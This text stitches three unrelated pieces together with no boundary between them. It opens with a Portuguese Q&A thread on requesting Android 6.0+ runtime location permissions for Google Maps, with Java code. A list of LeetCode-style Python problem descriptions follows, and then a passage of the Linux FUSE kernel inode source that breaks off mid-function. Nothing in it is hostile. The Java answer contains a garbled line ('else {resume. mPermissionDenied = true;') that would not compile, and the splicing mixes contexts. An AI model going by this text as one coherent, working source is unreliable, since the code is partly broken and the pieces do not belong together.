4 Estou com um problema nas api 23+ do google especificamente no método mapa.setMyLocationEnabled(true); Necessita de permissão para executar e, no android 6.0+, eu não consigo implementar o novo método de permissões. @Override public void onMapReady(GoogleMap googleMap) { mapa = googleMap; mapa.setOnCameraChangeListener(getCameraChangeListener()); verificaConexao(); Toast.makeText(getActivity(), "versão 0.007", Toast.LENGTH_SHORT).show(); try { mapa.setMyLocationEnabled(true); locationManager = (LocationManager) getActivity().getSystemService(Context.LOCATION_SERVICE); locationManager.requestLocationUpdates( LocationManager.GPS_PROVIDER, TEMPO_MINIMO_UPDATE, DISTANCIA_MINIMA_PARA_UPDATE, new MyLocationListener() ); //LocationManager.NETWORK_PROVIDER ou LocationManager.GPS_PROVIDER ou LocationManager.PASSIVE_PROVIDER } catch (SecurityException ex) { Toast.makeText(getActivity(), "Minha localização entrou em catch" + ex, Toast.LENGTH_LONG).show(); } 4 Se o aplicativo precisa acessar a localização do usuário, é necessário solicitar permissão adicionando a permissão de localização do Android relevante ao aplicativo. Adicione as permissões ao manifesto do aplicativo <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> Solicitar permissões em tempo de execução O Android 6.0 (Marshmallow) introduziu um novo modelo de processamento de permissões que otimiza o processo para usuários quando instalam e atualizam aplicativos. Se o aplicativo é direcionado ao nível da API 23 ou mais recente, você pode usar o novo modelo de permissões. crie a classe PermitirLocalização **A classe mostrará o dialogo e informações necessárias que o úsuario precisa saber. 
public class PermitirLocalizacao { public static void requestPermission(MapsActivity activity, int requestId, String permission, boolean finishActivity) { if (ActivityCompat.shouldShowRequestPermissionRationale(activity, permission)) { PermitirLocalizacao.RationaleDialog.newInstance(requestId, finishActivity) .show(activity.getSupportFragmentManager(), "dialog"); } else { ActivityCompat.requestPermissions(activity, new String[]{permission}, requestId); } } public static boolean isPermissionGranted(String[] grantPermissions, int[] grantResults, String permission) { for (int i = 0; i < grantPermissions.length; i++) { if (permission.equals(grantPermissions[i])) { return grantResults[i] == PackageManager.PERMISSION_GRANTED; } } return false; } public static class PermissionDeniedDialog extends DialogFragment { private static final String ARGUMENT_FINISH_ACTIVITY = "finish"; private boolean mFinishActivity = false; public static PermissionDeniedDialog newInstance(boolean finishActivity) { Bundle arguments = new Bundle(); arguments.putBoolean(ARGUMENT_FINISH_ACTIVITY, finishActivity); PermissionDeniedDialog dialog = new PermissionDeniedDialog(); dialog.setArguments(arguments); return dialog; } @Override public Dialog onCreateDialog(Bundle savedInstanceState) { mFinishActivity = getArguments().getBoolean(ARGUMENT_FINISH_ACTIVITY); return new AlertDialog.Builder(getActivity()) .setMessage("Este exemplo requere uma permissão para acessar \\'a minha localização\\' layer. 
Please try again and grant access to use the location.\\nIf the permission has been permanently denied, it can be enabled from the System Settings &gt; Apps &gt; \\'Google Maps API Demos\\'") .setPositiveButton(android.R.string.ok, null) .create(); } @Override public void onDismiss(DialogInterface dialog) { super.onDismiss(dialog); if (mFinishActivity) { Toast.makeText(getActivity(), "A permissão é necessária para continuar.", Toast.LENGTH_SHORT).show(); getActivity().finish(); } } } public static class RationaleDialog extends DialogFragment { private static final String ARGUMENT_PERMISSION_REQUEST_CODE = "requestCode"; private static final String ARGUMENT_FINISH_ACTIVITY = "finish"; private boolean mFinishActivity = false; public static RationaleDialog newInstance(int requestCode, boolean finishActivity) { Bundle arguments = new Bundle(); arguments.putInt(ARGUMENT_PERMISSION_REQUEST_CODE, requestCode); arguments.putBoolean(ARGUMENT_FINISH_ACTIVITY, finishActivity); RationaleDialog dialog = new RationaleDialog(); dialog.setArguments(arguments); return dialog; } @Override public Dialog onCreateDialog(Bundle savedInstanceState) { Bundle arguments = getArguments(); final int requestCode = arguments.getInt(ARGUMENT_PERMISSION_REQUEST_CODE); mFinishActivity = arguments.getBoolean(ARGUMENT_FINISH_ACTIVITY); return new AlertDialog.Builder(getActivity()) .setMessage("O acesso ao serviço de localização é necessário para demonstrar a funcionalidade.") .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() { @Override public void onClick(DialogInterface dialog, int which) { ActivityCompat.requestPermissions(getActivity(), new String[]{Manifest.permission.ACCESS_FINE_LOCATION}, requestCode); mFinishActivity = false; } }) .setNegativeButton(android.R.string.cancel, null) .create(); } @Override public void onDismiss(DialogInterface dialog) { super.onDismiss(dialog); if (mFinishActivity) { Toast.makeText(getActivity(), "permissão Localização é necessário 
para esta demonstração", Toast.LENGTH_SHORT) .show(); getActivity().finish(); } } } } Na sua activity do mapa: public class MapsActivity extends FragmentActivity implements GoogleMap.OnMyLocationButtonClickListener, OnMapReadyCallback, ActivityCompat.OnRequestPermissionsResultCallback { private GoogleMap mMap; private static final int LOCATION_PERMISSION_REQUEST_CODE = 1; private boolean mPermissionDenied = false; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_maps); SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager() .findFragmentById(R.id.map); mapFragment.getMapAsync(this); } @Override public void onMapReady(GoogleMap googleMap) { mMap = googleMap; enableMyLocation(); } private void enableMyLocation() { if (ContextCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED) { PermitirLocalizacao.requestPermission(this, LOCATION_PERMISSION_REQUEST_CODE, Manifest.permission.ACCESS_FINE_LOCATION, true); } else if (mMap != null) { mMap.setMyLocationEnabled(true); } } @Override public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) { if (requestCode != LOCATION_PERMISSION_REQUEST_CODE) { return; } if (PermitirLocalizacao.isPermissionGranted(permissions, grantResults, Manifest.permission.ACCESS_FINE_LOCATION)) { enableMyLocation(); } else {resume. mPermissionDenied = true; } } @Override protected void onResumeFragments() { super.onResumeFragments(); if (mPermissionDenied) { showMissingPermissionError(); mPermissionDenied = false; } } private void showMissingPermissionError() { PermitirLocalizacao.PermissionDeniedDialog .newInstance(true).show(getSupportFragmentManager(), "dialog"); } Esse código resolveu o meu problema, espero que resolva o seu também, forte abraço. 
Fonte: Google Android developers • muito obrigado maico resposta perfeita – Roger Casagrande 23/08/16 às 5:05 Esta não é a resposta que você está procurando? Pesquise outras perguntas com a tag ou faça sua própria pergunta.
Minimum Absolute Difference in Python
Given an array of distinct integers arr, find all pairs of elements with the minimum absolute difference of any two elements. Return a list of pairs in ascending order (with respect to pairs); each pair [a, b] follows: a, b are from arr; a < b; b - a equals the minimum absolute difference of any two elements in arr. Example 1: Input: arr = [4,2,1,3] …

Minimum Time Visiting All Points in Python
On a plane, there are n points with integer coordinates points[i] = [xi, yi]. Your task is to find the minimum time in seconds to visit all points. You can move according to the next rules: In one second you can always either move vertically or horizontally by one unit, or diagonally (which means moving one unit vertically …

Search Suggestions System in Python
Given an array of strings products and a string searchWord, we want to design a system that suggests at most three product names from products after each character of searchWord is typed. Suggested products should have a common prefix with the searchWord. If there are more than three products with a common prefix, return the three lexicographically minimum products. Return a list of lists of the suggested products after each …

Find Winner on a Tic Tac Toe Game in Python
Tic-tac-toe is played by two players A and B on a 3 x 3 grid. Here are the rules of Tic-Tac-Toe: Players take turns placing characters into empty squares (" "). The first player A always places "X" characters, while the second player B always places "O" characters. "X" and "O" characters are always placed into empty squares, never on filled ones. The game ends when there are 3 …

Number of Burgers with No Waste of Ingredients in Python
Given two integers tomatoSlices and cheeseSlices.
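The first problem above (Minimum Absolute Difference) can be solved by sorting and comparing only adjacent elements; a short Python sketch:

```python
def minimum_abs_difference(arr):
    # After sorting, the minimum absolute difference must occur
    # between some pair of adjacent elements.
    arr = sorted(arr)
    best = min(b - a for a, b in zip(arr, arr[1:]))
    return [[a, b] for a, b in zip(arr, arr[1:]) if b - a == best]

print(minimum_abs_difference([4, 2, 1, 3]))   # [[1, 2], [2, 3], [3, 4]]
```

Sorting costs O(n log n) and the two passes over adjacent pairs are linear, which is also why the returned pairs come out in ascending order automatically.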
The ingredients of different burgers are as follows: Jumbo Burger: 4 tomato slices and 1 cheese slice. Small Burger: 2 tomato slices and 1 cheese slice. Return [total_jumbo, total_small] so that the number of remaining tomatoSlices equals 0 and the number of remaining cheeseSlices equals 0. If it is not possible …

Group the People Given the Group Size They Belong To in Python
Problem: There are n people whose IDs go from 0 to n - 1 and each person belongs to exactly one group. Given the array groupSizes of length n telling the group size each person belongs to, return the groups there are and the people's IDs each group includes. You can return any solution in any order and …

Find the Smallest Divisor Given a Threshold in Python
Problem: Given an array of integers nums and an integer threshold, we will choose a positive integer divisor, divide all the array by it, and sum the results of the division. Find the smallest divisor such that the result mentioned above is less than or equal to threshold. Each result of division is rounded to the nearest integer greater than …
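The last problem above (Find the Smallest Divisor Given a Threshold) is a classic binary search on the answer; a Python sketch, assuming the standard formulation in which each division result is rounded up:

```python
from math import ceil

def smallest_divisor(nums, threshold):
    # The summed ceilings only shrink as the divisor grows,
    # so we can binary-search the smallest divisor that fits.
    lo, hi = 1, max(nums)
    while lo < hi:
        mid = (lo + hi) // 2
        if sum(ceil(x / mid) for x in nums) <= threshold:
            hi = mid          # mid works; try something smaller
        else:
            lo = mid + 1      # mid is too small a divisor
    return lo

print(smallest_divisor([1, 2, 5, 9], 6))   # 5
```

The monotonicity of the summed ceilings is what makes the binary search valid: each candidate divisor is checked in O(n), for O(n log(max(nums))) overall.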
/*
  FUSE: Filesystem in Userspace
  Copyright (C) 2001-2008  Miklos Szeredi <[email protected]>

  This program can be distributed under the terms of the GNU GPL.
  See the file COPYING.
*/

#include "fuse_i.h"

#include <linux/pagemap.h>
#include <linux/slab.h>
#include <linux/file.h>
#include <linux/seq_file.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/parser.h>
#include <linux/statfs.h>
#include <linux/random.h>
#include <linux/sched.h>
#include <linux/exportfs.h>

MODULE_AUTHOR("Miklos Szeredi <[email protected]>");
MODULE_DESCRIPTION("Filesystem in Userspace");
MODULE_LICENSE("GPL");

static struct kmem_cache *fuse_inode_cachep;
struct list_head fuse_conn_list;
DEFINE_MUTEX(fuse_mutex);

static int set_global_limit(const char *val, struct kernel_param *kp);

unsigned max_user_bgreq;
module_param_call(max_user_bgreq, set_global_limit, param_get_uint,
		  &max_user_bgreq, 0644);
__MODULE_PARM_TYPE(max_user_bgreq, "uint");
MODULE_PARM_DESC(max_user_bgreq,
 "Global limit for the maximum number of backgrounded requests an "
 "unprivileged user can set");

unsigned max_user_congthresh;
module_param_call(max_user_congthresh, set_global_limit, param_get_uint,
		  &max_user_congthresh, 0644);
__MODULE_PARM_TYPE(max_user_congthresh, "uint");
MODULE_PARM_DESC(max_user_congthresh,
 "Global limit for the maximum congestion threshold an "
 "unprivileged user can set");

#define FUSE_SUPER_MAGIC 0x65735546

#define FUSE_DEFAULT_BLKSIZE 512

/** Maximum number of outstanding background requests */
#define FUSE_DEFAULT_MAX_BACKGROUND 12

/** Congestion starts at 75% of maximum */
#define FUSE_DEFAULT_CONGESTION_THRESHOLD (FUSE_DEFAULT_MAX_BACKGROUND * 3 / 4)

struct fuse_mount_data {
	int fd;
	unsigned rootmode;
	kuid_t user_id;
	kgid_t group_id;
	unsigned fd_present:1;
	unsigned rootmode_present:1;
	unsigned user_id_present:1;
	unsigned group_id_present:1;
	unsigned flags;
	unsigned max_read;
	unsigned blksize;
};

struct fuse_forget_link *fuse_alloc_forget(void)
{
	return kzalloc(sizeof(struct fuse_forget_link), GFP_KERNEL);
}

static struct inode *fuse_alloc_inode(struct super_block *sb)
{
	struct inode *inode;
	struct fuse_inode *fi;

	inode = kmem_cache_alloc(fuse_inode_cachep, GFP_KERNEL);
	if (!inode)
		return NULL;

	fi = get_fuse_inode(inode);
	fi->i_time = 0;
	fi->nodeid = 0;
	fi->nlookup = 0;
	fi->attr_version = 0;
	fi->writectr = 0;
	fi->orig_ino = 0;
	fi->state = 0;
	INIT_LIST_HEAD(&fi->write_files);
	INIT_LIST_HEAD(&fi->queued_writes);
	INIT_LIST_HEAD(&fi->writepages);
	init_waitqueue_head(&fi->page_waitq);
	fi->forget = fuse_alloc_forget();
	if (!fi->forget) {
		kmem_cache_free(fuse_inode_cachep, inode);
		return NULL;
	}

	return inode;
}

static void fuse_i_callback(struct rcu_head *head)
{
	struct inode *inode = container_of(head, struct inode, i_rcu);
	kmem_cache_free(fuse_inode_cachep, inode);
}

static void fuse_destroy_inode(struct inode *inode)
{
	struct fuse_inode *fi = get_fuse_inode(inode);
	BUG_ON(!list_empty(&fi->write_files));
	BUG_ON(!list_empty(&fi->queued_writes));
	kfree(fi->forget);
	call_rcu(&inode->i_rcu, fuse_i_callback);
}

static void fuse_evict_inode(struct inode *inode)
{
	truncate_inode_pages_final(&inode->i_data);
	clear_inode(inode);
	if (inode->i_sb->s_flags & MS_ACTIVE) {
		struct fuse_conn *fc = get_fuse_conn(inode);
		struct fuse_inode *fi = get_fuse_inode(inode);
		fuse_queue_forget(fc, fi->forget, fi->nodeid, fi->nlookup);
		fi->forget = NULL;
	}
}

static int fuse_remount_fs(struct super_block *sb, int *flags, char *data)
{
	sync_filesystem(sb);
	if (*flags & MS_MANDLOCK)
		return -EINVAL;

	return 0;
}

/*
 * ino_t is 32-bits on 32-bit arch. We have to squash the 64-bit value down
 * so that it will fit.
 */
static ino_t fuse_squash_ino(u64 ino64)
{
	ino_t ino = (ino_t) ino64;
	if (sizeof(ino_t) < sizeof(u64))
		ino ^= ino64 >> (sizeof(u64) - sizeof(ino_t)) * 8;
	return ino;
}

void fuse_change_attributes_common(struct inode *inode, struct fuse_attr *attr,
				   u64 attr_valid)
{
	struct fuse_conn *fc = get_fuse_conn(inode);
	struct fuse_inode *fi = get_fuse_inode(inode);

	fi->attr_version = ++fc->attr_version;
	fi->i_time = attr_valid;

	inode->i_ino     = fuse_squash_ino(attr->ino);
	inode->i_mode    = (inode->i_mode & S_IFMT) | (attr->mode & 07777);
	set_nlink(inode, attr->nlink);
	inode->i_uid     = make_kuid(&init_user_ns, attr->uid);
	inode->i_gid     = make_kgid(&init_user_ns, attr->gid);
	inode->i_blocks  = attr->blocks;
	inode->i_atime.tv_sec   = attr->atime;
	inode->i_atime.tv_nsec  = attr->atimensec;
	/* mtime from server may be stale due to local buffered write */
	if (!fc->writeback_cache || !S_ISREG(inode->i_mode)) {
		inode->i_mtime.tv_sec   = attr->mtime;
		inode->i_mtime.tv_nsec  = attr->mtimensec;
		inode->i_ctime.tv_sec   = attr->ctime;
		inode->i_ctime.tv_nsec  = attr->ctimensec;
	}

	if (attr->blksize != 0)
		inode->i_blkbits = ilog2(attr->blksize);
	else
		inode->i_blkbits = inode->i_sb->s_blocksize_bits;

	/*
	 * Don't set the sticky bit in i_mode, unless we want the VFS
	 * to check permissions.  This prevents failures due to the
	 * check in may_delete().
	 */
	fi->orig_i_mode = inode->i_mode;
	if (!(fc->flags & FUSE_DEFAULT_PERMISSIONS))
		inode->i_mode &= ~S_ISVTX;

	fi->orig_ino = attr->ino;
}

void fuse_change_attributes(struct inode *inode, struct fuse_attr *attr,
			    u64 attr_valid, u64 attr_version)
{
	struct fuse_conn *fc = get_fuse_conn(inode);
	struct fuse_inode *fi = get_fuse_inode(inode);
	bool is_wb = fc->writeback_cache;
	loff_t oldsize;
	struct timespec old_mtime;

	spin_lock(&fc->lock);
	if ((attr_version != 0 && fi->attr_version > attr_version) ||
	    test_bit(FUSE_I_SIZE_UNSTABLE, &fi->state)) {
		spin_unlock(&fc->lock);
		return;
	}

	old_mtime = inode->i_mtime;
	fuse_change_attributes_common(inode, attr, attr_valid);

	oldsize = inode->i_size;
	/*
	 * In case of writeback_cache enabled, the cached writes beyond EOF
	 * extend local i_size without keeping userspace server in sync. So,
	 * attr->size coming from server can be stale. We cannot trust it.
	 */
	if (!is_wb || !S_ISREG(inode->i_mode))
		i_size_write(inode, attr->size);
	spin_unlock(&fc->lock);

	if (!is_wb && S_ISREG(inode->i_mode)) {
		bool inval = false;

		if (oldsize != attr->size) {
			truncate_pagecache(inode, attr->size);
			inval = true;
		} else if (fc->auto_inval_data) {
			struct timespec new_mtime = {
				.tv_sec = attr->mtime,
				.tv_nsec = attr->mtimensec,
			};

			/*
			 * Auto inval mode also checks and invalidates if mtime
			 * has changed.
			 */
			if (!timespec_equal(&old_mtime, &new_mtime))
				inval = true;
		}

		if (inval)
			invalidate_inode_pages2(inode->i_mapping);
	}
}

static void fuse_init_inode(struct inode *inode, struct fuse_attr *attr)
{
	inode->i_mode = attr->mode & S_IFMT;
	inode->i_size = attr->size;
	inode->i_mtime.tv_sec  = attr->mtime;
	inode->i_mtime.tv_nsec = attr->mtimensec;
	inode->i_ctime.tv_sec  = attr->ctime;
	inode->i_ctime.tv_nsec = attr->ctimensec;
	if (S_ISREG(inode->i_mode)) {
		fuse_init_common(inode);
		fuse_init_file_inode(inode);
	} else if (S_ISDIR(inode->i_mode))
		fuse_init_dir(inode);
	else if (S_ISLNK(inode->i_mode))
		fuse_init_symlink(inode);
	else if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode) ||
		 S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
		fuse_init_common(inode);
		init_special_inode(inode, inode->i_mode,
				   new_decode_dev(attr->rdev));
	} else
		BUG();
}

int fuse_inode_eq(struct inode *inode, void *_nodeidp)
{
	u64 nodeid = *(u64 *) _nodeidp;
	if (get_node_id(inode) == nodeid)
		return 1;
	else
		return 0;
}

static int fuse_inode_set(struct inode *inode, void *_nodeidp)
{
	u64 nodeid = *(u64 *) _nodeidp;
	get_fuse_inode(inode)->nodeid = nodeid;
	return 0;
}

struct inode *fuse_iget(struct super_block *sb, u64 nodeid,
			int generation, struct fuse_attr *attr,
			u64 attr_valid, u64 attr_version)
{
	struct inode *inode;
	struct fuse_inode *fi;
	struct fuse_conn *fc = get_fuse_conn_super(sb);

 retry:
	inode = iget5_locked(sb, nodeid, fuse_inode_eq, fuse_inode_set, &nodeid);
	if (!inode)
		return NULL;

	if ((inode->i_state & I_NEW)) {
		inode->i_flags |= S_NOATIME;
		if (!fc->writeback_cache || !S_ISREG(attr->mode))
			inode->i_flags |= S_NOCMTIME;
		inode->i_generation = generation;
		fuse_init_inode(inode, attr);
		unlock_new_inode(inode);
	} else if ((inode->i_mode ^ attr->mode) & S_IFMT) {
		/* Inode has changed type, any I/O on the old should fail */
		make_bad_inode(inode);
		iput(inode);
		goto retry;
	}

	fi = get_fuse_inode(inode);
	spin_lock(&fc->lock);
	fi->nlookup++;
	spin_unlock(&fc->lock);
	fuse_change_attributes(inode, attr,
			       attr_valid, attr_version);

	return inode;
}

int fuse_reverse_inval_inode(struct super_block *sb, u64 nodeid,
			     loff_t offset, loff_t len)
{
	struct inode *inode;
	pgoff_t pg_start;
	pgoff_t pg_end;

	inode = ilookup5(sb, nodeid, fuse_inode_eq, &nodeid);
	if (!inode)
		return -ENOENT;

	fuse_invalidate_attr(inode);
	if (offset >= 0) {
		pg_start = offset >> PAGE_SHIFT;
		if (len <= 0)
			pg_end = -1;
		else
			pg_end = (offset + len - 1) >> PAGE_SHIFT;
		invalidate_inode_pages2_range(inode->i_mapping,
					      pg_start, pg_end);
	}
	iput(inode);
	return 0;
}

static void fuse_umount_begin(struct super_block *sb)
{
	fuse_abort_conn(get_fuse_conn_super(sb));
}

static void fuse_send_destroy(struct fuse_conn *fc)
{
	struct fuse_req *req = fc->destroy_req;
	if (req && fc->conn_init) {
		fc->destroy_req = NULL;
		req->in.h.opcode = FUSE_DESTROY;
		__set_bit(FR_FORCE, &req->flags);
		__clear_bit(FR_BACKGROUND, &req->flags);
		fuse_request_send(fc, req);
		fuse_put_request(fc, req);
	}
}

static void fuse_bdi_destroy(struct fuse_conn *fc)
{
	if (fc->bdi_initialized)
		bdi_destroy(&fc->bdi);
}

static void fuse_put_super(struct super_block *sb)
{
	struct fuse_conn *fc = get_fuse_conn_super(sb);

	fuse_send_destroy(fc);

	fuse_abort_conn(fc);
	mutex_lock(&fuse_mutex);
	list_del(&fc->entry);
	fuse_ctl_remove_conn(fc);
	mutex_unlock(&fuse_mutex);
	fuse_bdi_destroy(fc);

	fuse_conn_put(fc);
}

static void convert_fuse_statfs(struct kstatfs *stbuf, struct fuse_kstatfs *attr)
{
	stbuf->f_type    = FUSE_SUPER_MAGIC;
	stbuf->f_bsize   = attr->bsize;
	stbuf->f_frsize  = attr->frsize;
	stbuf->f_blocks  = attr->blocks;
	stbuf->f_bfree   = attr->bfree;
	stbuf->f_bavail  = attr->bavail;
	stbuf->f_files   = attr->files;
	stbuf->f_ffree   = attr->ffree;
	stbuf->f_namelen = attr->namelen;
	/* fsid is left zero */
}

static int fuse_statfs(struct dentry *dentry, struct kstatfs *buf)
{
	struct super_block *sb = dentry->d_sb;
	struct fuse_conn *fc = get_fuse_conn_super(sb);
	FUSE_ARGS(args);
	struct fuse_statfs_out outarg;
	int err;

	if (!fuse_allow_current_process(fc)) {
		buf->f_type =
			FUSE_SUPER_MAGIC;
		return 0;
	}

	memset(&outarg, 0, sizeof(outarg));
	args.in.numargs = 0;
	args.in.h.opcode = FUSE_STATFS;
	args.in.h.nodeid = get_node_id(d_inode(dentry));
	args.out.numargs = 1;
	args.out.args[0].size = sizeof(outarg);
	args.out.args[0].value = &outarg;
	err = fuse_simple_request(fc, &args);
	if (!err)
		convert_fuse_statfs(buf, &outarg.st);
	return err;
}

enum {
	OPT_FD,
	OPT_ROOTMODE,
	OPT_USER_ID,
	OPT_GROUP_ID,
	OPT_DEFAULT_PERMISSIONS,
	OPT_ALLOW_OTHER,
	OPT_MAX_READ,
	OPT_BLKSIZE,
	OPT_ERR
};

static const match_table_t tokens = {
	{OPT_FD,			"fd=%u"},
	{OPT_ROOTMODE,			"rootmode=%o"},
	{OPT_USER_ID,			"user_id=%u"},
	{OPT_GROUP_ID,			"group_id=%u"},
	{OPT_DEFAULT_PERMISSIONS,	"default_permissions"},
	{OPT_ALLOW_OTHER,		"allow_other"},
	{OPT_MAX_READ,			"max_read=%u"},
	{OPT_BLKSIZE,			"blksize=%u"},
	{OPT_ERR,			NULL}
};

static int fuse_match_uint(substring_t *s, unsigned int *res)
{
	int err = -ENOMEM;
	char *buf = match_strdup(s);
	if (buf) {
		err = kstrtouint(buf, 10, res);
		kfree(buf);
	}
	return err;
}

static int parse_fuse_opt(char *opt, struct fuse_mount_data *d, int is_bdev)
{
	char *p;
	memset(d, 0, sizeof(struct fuse_mount_data));
	d->max_read = ~0;
	d->blksize = FUSE_DEFAULT_BLKSIZE;

	while ((p = strsep(&opt, ",")) != NULL) {
		int token;
		int value;
		unsigned uv;
		substring_t args[MAX_OPT_ARGS];
		if (!*p)
			continue;

		token = match_token(p, tokens, args);
		switch (token) {
		case OPT_FD:
			if (match_int(&args[0], &value))
				return 0;
			d->fd = value;
			d->fd_present = 1;
			break;

		case OPT_ROOTMODE:
			if (match_octal(&args[0], &value))
				return 0;
			if (!fuse_valid_type(value))
				return 0;
			d->rootmode = value;
			d->rootmode_present = 1;
			break;

		case OPT_USER_ID:
			if (fuse_match_uint(&args[0], &uv))
				return 0;
			d->user_id = make_kuid(current_user_ns(), uv);
			if (!uid_valid(d->user_id))
				return 0;
			d->user_id_present = 1;
			break;

		case OPT_GROUP_ID:
			if (fuse_match_uint(&args[0], &uv))
				return 0;
			d->group_id = make_kgid(current_user_ns(), uv);
			if (!gid_valid(d->group_id))
				return 0;
			d->group_id_present = 1;
			break;

		case
		     OPT_DEFAULT_PERMISSIONS:
			d->flags |= FUSE_DEFAULT_PERMISSIONS;
			break;

		case OPT_ALLOW_OTHER:
			d->flags |= FUSE_ALLOW_OTHER;
			break;

		case OPT_MAX_READ:
			if (match_int(&args[0], &value))
				return 0;
			d->max_read = value;
			break;

		case OPT_BLKSIZE:
			if (!is_bdev || match_int(&args[0], &value))
				return 0;
			d->blksize = value;
			break;

		default:
			return 0;
		}
	}

	if (!d->fd_present || !d->rootmode_present ||
	    !d->user_id_present || !d->group_id_present)
		return 0;

	return 1;
}

static int fuse_show_options(struct seq_file *m, struct dentry *root)
{
	struct super_block *sb = root->d_sb;
	struct fuse_conn *fc = get_fuse_conn_super(sb);

	seq_printf(m, ",user_id=%u",
		   from_kuid_munged(&init_user_ns, fc->user_id));
	seq_printf(m, ",group_id=%u",
		   from_kgid_munged(&init_user_ns, fc->group_id));
	if (fc->flags & FUSE_DEFAULT_PERMISSIONS)
		seq_puts(m, ",default_permissions");
	if (fc->flags & FUSE_ALLOW_OTHER)
		seq_puts(m, ",allow_other");
	if (fc->max_read != ~0)
		seq_printf(m, ",max_read=%u", fc->max_read);
	if (sb->s_bdev && sb->s_blocksize != FUSE_DEFAULT_BLKSIZE)
		seq_printf(m, ",blksize=%lu", sb->s_blocksize);
	return 0;
}

static void fuse_iqueue_init(struct fuse_iqueue *fiq)
{
	memset(fiq, 0, sizeof(struct fuse_iqueue));
	init_waitqueue_head(&fiq->waitq);
	INIT_LIST_HEAD(&fiq->pending);
	INIT_LIST_HEAD(&fiq->interrupts);
	fiq->forget_list_tail = &fiq->forget_list_head;
	fiq->connected = 1;
}

static void fuse_pqueue_init(struct fuse_pqueue *fpq)
{
	memset(fpq, 0, sizeof(struct fuse_pqueue));
	spin_lock_init(&fpq->lock);
	INIT_LIST_HEAD(&fpq->processing);
	INIT_LIST_HEAD(&fpq->io);
	fpq->connected = 1;
}

void fuse_conn_init(struct fuse_conn *fc)
{
	memset(fc, 0, sizeof(*fc));
	spin_lock_init(&fc->lock);
	init_rwsem(&fc->killsb);
	atomic_set(&fc->count, 1);
	atomic_set(&fc->dev_count, 1);
	init_waitqueue_head(&fc->blocked_waitq);
	init_waitqueue_head(&fc->reserved_req_waitq);
	fuse_iqueue_init(&fc->iq);
	INIT_LIST_HEAD(&fc->bg_queue);
	INIT_LIST_HEAD(&fc->entry);
	INIT_LIST_HEAD(&fc->devices);
	atomic_set(&fc->num_waiting, 0);
	fc->max_background = FUSE_DEFAULT_MAX_BACKGROUND;
	fc->congestion_threshold = FUSE_DEFAULT_CONGESTION_THRESHOLD;
	fc->khctr = 0;
	fc->polled_files = RB_ROOT;
	fc->blocked = 0;
	fc->initialized = 0;
	fc->connected = 1;
	fc->attr_version = 1;
	get_random_bytes(&fc->scramble_key, sizeof(fc->scramble_key));
}
EXPORT_SYMBOL_GPL(fuse_conn_init);

void fuse_conn_put(struct fuse_conn *fc)
{
	if (atomic_dec_and_test(&fc->count)) {
		if (fc->destroy_req)
			fuse_request_free(fc->destroy_req);
		fc->release(fc);
	}
}
EXPORT_SYMBOL_GPL(fuse_conn_put);

struct fuse_conn *fuse_conn_get(struct fuse_conn *fc)
{
	atomic_inc(&fc->count);
	return fc;
}
EXPORT_SYMBOL_GPL(fuse_conn_get);

static struct inode *fuse_get_root_inode(struct super_block *sb, unsigned mode)
{
	struct fuse_attr attr;
	memset(&attr, 0, sizeof(attr));

	attr.mode = mode;
	attr.ino = FUSE_ROOT_ID;
	attr.nlink = 1;
	return fuse_iget(sb, 1, 0, &attr, 0, 0);
}

struct fuse_inode_handle {
	u64 nodeid;
	u32 generation;
};

static struct dentry *fuse_get_dentry(struct super_block *sb,
				      struct fuse_inode_handle *handle)
{
	struct fuse_conn *fc = get_fuse_conn_super(sb);
	struct inode *inode;
	struct dentry *entry;
	int err = -ESTALE;

	if (handle->nodeid == 0)
		goto out_err;

	inode = ilookup5(sb, handle->nodeid, fuse_inode_eq, &handle->nodeid);
	if (!inode) {
		struct fuse_entry_out outarg;
		struct qstr name;

		if (!fc->export_support)
			goto out_err;

		name.len = 1;
		name.name = ".";
		err = fuse_lookup_name(sb, handle->nodeid, &name, &outarg,
				       &inode);
		if (err && err != -ENOENT)
			goto out_err;
		if (err || !inode) {
			err = -ESTALE;
			goto out_err;
		}
		err = -EIO;
		if (get_node_id(inode) != handle->nodeid)
			goto out_iput;
	}
	err = -ESTALE;
	if (inode->i_generation != handle->generation)
		goto out_iput;

	entry = d_obtain_alias(inode);
	if (!IS_ERR(entry) && get_node_id(inode) != FUSE_ROOT_ID)
		fuse_invalidate_entry_cache(entry);

	return entry;

 out_iput:
	iput(inode);
 out_err:
	return ERR_PTR(err);
}

static int fuse_encode_fh(struct inode *inode, u32 *fh, int *max_len,
			  struct inode *parent)
{
	int len = parent ? 6 : 3;
	u64 nodeid;
	u32 generation;

	if (*max_len < len) {
		*max_len = len;
		return  FILEID_INVALID;
	}

	nodeid = get_fuse_inode(inode)->nodeid;
	generation = inode->i_generation;

	fh[0] = (u32)(nodeid >> 32);
	fh[1] = (u32)(nodeid & 0xffffffff);
	fh[2] = generation;

	if (parent) {
		nodeid = get_fuse_inode(parent)->nodeid;
		generation = parent->i_generation;

		fh[3] = (u32)(nodeid >> 32);
		fh[4] = (u32)(nodeid & 0xffffffff);
		fh[5] = generation;
	}

	*max_len = len;
	return parent ? 0x82 : 0x81;
}

static struct dentry *fuse_fh_to_dentry(struct super_block *sb,
		struct fid *fid, int fh_len, int fh_type)
{
	struct fuse_inode_handle handle;

	if ((fh_type != 0x81 && fh_type != 0x82) || fh_len < 3)
		return NULL;

	handle.nodeid = (u64) fid->raw[0] << 32;
	handle.nodeid |= (u64) fid->raw[1];
	handle.generation = fid->raw[2];
	return fuse_get_dentry(sb, &handle);
}

static struct dentry *fuse_fh_to_parent(struct super_block *sb,
		struct fid *fid, int fh_len, int fh_type)
{
	struct fuse_inode_handle parent;

	if (fh_type != 0x82 || fh_len < 6)
		return NULL;

	parent.nodeid = (u64) fid->raw[3] << 32;
	parent.nodeid |= (u64) fid->raw[4];
	parent.generation = fid->raw[5];
	return fuse_get_dentry(sb, &parent);
}

static struct dentry *fuse_get_parent(struct dentry *child)
{
